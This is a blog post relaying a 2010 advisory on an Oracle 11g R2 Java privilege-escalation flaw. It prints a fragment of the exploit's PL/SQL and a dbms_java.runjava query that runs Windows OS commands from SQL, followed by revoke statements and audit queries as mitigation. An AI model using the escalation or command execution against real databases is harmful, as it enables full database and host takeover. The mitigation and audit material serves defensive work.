Oracle internals, debugging and undocumented features
Oracle Exploit Published 11g R2
February 5, 2010
Just found this alert.
Credit goes to David Litchfield. He found these vulnerabilities. This also affects 11g R2.
Overgenerous privileges for Java procedures allow users to escalate their own privileges, up to the point of gaining complete control over the database.
Basically, by using DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS, a user can change their own privileges in the Java policy table so that the JVM allows them to execute operating system commands and to read and write files.
Here is the code:
CURSOR C1 IS SELECT 'GRANT', USER(), 'SYS', 'java.io.FilePermission', '<<ALL FILES>>', 'execute', 'ENABLED' from dual;
FETCH C1 BULK COLLECT INTO POL;
After the Java privilege escalation it is possible to run OS commands using a simple SELECT statement:
select dbms_java.runjava('oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst') from dual;
Oracle does not have a patch for it yet, but you should revoke the EXECUTE privilege from PUBLIC on the following packages:
revoke execute on DBMS_JVM_EXP_PERMS from public;
revoke execute on DBMS_JAVA from public;
revoke execute on DBMS_JAVA_TEST from public;
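
To check the effect of these revokes and look for Java policy entries like the one described above, the following audit queries can be run from a DBA account. This is an added example, not part of the original post; it assumes read access to the DBA_DEPENDENCIES, DBA_TAB_PRIVS and DBA_JAVA_POLICY dictionary views.

```sql
-- Added example (not from the original post): audit queries for a DBA session.

-- 1. Before revoking: which non-SYS objects reference the three packages?
--    These may stop compiling or running once PUBLIC loses EXECUTE, so
--    their owners may need an explicit grant instead.
SELECT owner, name, type, referenced_name
FROM   dba_dependencies
WHERE  referenced_owner = 'SYS'
AND    referenced_name IN ('DBMS_JVM_EXP_PERMS', 'DBMS_JAVA', 'DBMS_JAVA_TEST')
AND    owner NOT IN ('SYS', 'PUBLIC')
ORDER  BY referenced_name, owner, name;

-- 2. After revoking: who can still execute the packages?
--    PUBLIC should no longer appear in this result.
SELECT grantee, table_name, privilege, grantable
FROM   dba_tab_privs
WHERE  owner = 'SYS'
AND    table_name IN ('DBMS_JVM_EXP_PERMS', 'DBMS_JAVA', 'DBMS_JAVA_TEST')
AND    privilege = 'EXECUTE'
ORDER  BY table_name, grantee;

-- 3. Java policy table: entries that allow 'execute' on all files.
--    The columns map one-to-one onto the values selected by the cursor
--    in the code above (kind, grantee, type_schema, type_name, name,
--    action, enabled). Compare the grantees against your own baseline;
--    an ordinary application or end-user account here needs investigating.
SELECT seq, kind, grantee, type_schema, type_name, name, action, enabled
FROM   dba_java_policy
WHERE  type_name = 'java.io.FilePermission'
AND    name = '<<ALL FILES>>'
AND    LOWER(action) LIKE '%execute%'
ORDER  BY grantee, seq;
```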